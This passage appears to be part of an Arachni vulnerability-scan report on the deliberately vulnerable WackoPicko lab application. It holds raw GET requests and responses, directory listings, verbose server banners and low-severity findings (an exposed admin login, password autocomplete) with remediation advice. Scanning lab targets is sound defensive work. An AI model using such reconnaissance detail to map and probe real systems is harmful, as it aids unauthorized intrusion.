<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/css/
pointing to
http://192.168.0.26/WackoPicko/css/
.
| Type | In | Action |
|---|---|---|
server |
http://192.168.0.26/WackoPicko/css/ | http://192.168.0.26/WackoPicko/css/ |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/css/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:48 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 454
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /WackoPicko/css</title>
</head>
<body>
<h1>Index of /WackoPicko/css</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/WackoPicko/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="blueprint/">blueprint/</a></td><td align="right">17-May-2011 21:25 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="stylings.css">stylings.css</a></td><td align="right">17-May-2011 21:25 </td><td align="right">3.0K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="stylings.php">stylings.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">3.2K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
An administration interface was identified and should be reviewed.
Access to administration interfaces should be restricted to trusted IP addresses only.
server
using
GET
at
http://192.168.0.26/WackoPicko/users/
pointing to
http://192.168.0.26/WackoPicko/users/
.
| Type | In | Action |
|---|---|---|
server |
http://192.168.0.26/WackoPicko/users/ | http://192.168.0.26/WackoPicko/users/ |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 301 Moved Permanently
Date: Mon, 06 Aug 2018 22:49:51 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Location: http://192.168.0.26/WackoPicko/users/
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 204
Content-Type: text/html; charset=iso-8859-1
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:51 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 519
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /WackoPicko/users</title>
</head>
<body>
<h1>Index of /WackoPicko/users</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/WackoPicko/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="check_pass.php">check_pass.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">584 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="home.php">home.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">1.6K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="login.php">login.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">1.3K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="logout.php">logout.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">176 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="register.php">register.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">1.9K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="sample.php">sample.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">125 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="similar.php">similar.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">778 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="view.php">view.php</a></td><td align="right">17-May-2011 21:25 </td><td align="right">833 </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
In typical form-based web applications, it is common practice for developers to
allow autocomplete within the HTML form to improve the usability of the page.
With autocomplete enabled (default), the browser is allowed to cache previously
entered form values.
For legitimate purposes, this allows the user to quickly re-enter the same data when completing the form multiple times.
When autocomplete is enabled on either/both the username and password fields,
this could allow a cyber-criminal with access to the victim’s computer the ability
to have the victim’s credentials automatically entered as the cyber-criminal
visits the affected page.
Arachni has discovered that the affected page contains a form containing a
password field that has not disabled autocomplete.
The autocomplete value can be configured in two different locations.
The first and most secure location is to disable the autocomplete attribute on
the <form> HTML tag. This will disable autocomplete for all inputs within that form.
An example of disabling autocomplete within the form tag is <form autocomplete=off>.
The second slightly less desirable option is to disable the autocomplete attribute
for a specific <input> HTML tag.
While this may be the less desired solution from a security perspective, it may
be preferred method for usability reasons, depending on size of the form.
An example of disabling the autocomplete attribute within a password input tag
is <input type=password autocomplete=off>.
form
with inputs
adminname
password
using
GET
at
http://192.168.0.26/WackoPicko/admin/index.php?page=login
pointing to
http://192.168.0.26/WackoPicko/admin/index.php?page=login
.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 | <form action="/WackoPicko/admin/index.php?page=login" method="POST"> Username : <input type="text" name="adminname"> </input> <br> </br> Password : <input type="password" name="password"> </input> <br> </br> <input type="submit" value="submit"> </input> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/admin/index.php?page=login | http://192.168.0.26/WackoPicko/admin/index.php?page=login |
|
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/admin/index.php?page=login HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 186
Content-Type: text/html
<h2>Admin Area</h2>
<form action="/WackoPicko/admin/index.php?page=login" method="POST">
Username : <input type="text" name="adminname" /><br>
Password : <input type="password" name="password" /><br>
<input type="submit" value="submit" />
</form>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/admin/index.php?page=login HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 186
Content-Type: text/html
<h2>Admin Area</h2>
<form action="/WackoPicko/admin/index.php?page=login" method="POST">
Username : <input type="text" name="adminname" /><br>
Password : <input type="password" name="password" /><br>
<input type="submit" value="submit" />
</form>
form
with inputs
password
using
GET
at
http://192.168.0.26/WackoPicko/passcheck.php
pointing to
http://192.168.0.26/WackoPicko/passcheck.php
.
0 1 2 3 4 5 6 7 8 9 10 | <form action="/WackoPicko/passcheck.php" method="POST"> Password to check: <br> </br> <input type="password" name="password"> </input> <br> </br> <input type="submit" value="Check!"> </input> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/passcheck.php | http://192.168.0.26/WackoPicko/passcheck.php |
|
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/passcheck.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:55:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 910
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Check your password strength</h2>
<form action="/WackoPicko/passcheck.php" method="POST">
Password to check: <br>
<input type="password" name="password" /><br>
<input type="submit" value="Check!" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/passcheck.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:55:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 910
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Check your password strength</h2>
<form action="/WackoPicko/passcheck.php" method="POST">
Password to check: <br>
<input type="password" name="password" /><br>
<input type="submit" value="Check!" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
form
with inputs
username
firstname
lastname
password
againpass
using
GET
at
http://192.168.0.26/WackoPicko/users/register.php
pointing to
http://192.168.0.26/WackoPicko/users/register.php
.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 | <form action="/WackoPicko/users/register.php" method="POST"> <tr> <td> Username : </td> <td> <input type="text" name="username"> </input> </td> </tr> <tr> <td> First Name : </td> <td> <input type="text" name="firstname"> </input> </td> </tr> <tr> <td> Last Name : </td> <td> <input type="text" name="lastname"> </input> </td> </tr> <tr> <td> Password : </td> <td> <input type="password" name="password"> </input> </td> </tr> <tr> <td> Password again : </td> <td> <input type="password" name="againpass"> </input> </td> </tr> <tr> <td> <input type="submit" value="Create Account!"> </input> </td> <td> </td> </tr> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/users/register.php | http://192.168.0.26/WackoPicko/users/register.php |
|
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/register.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1082
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
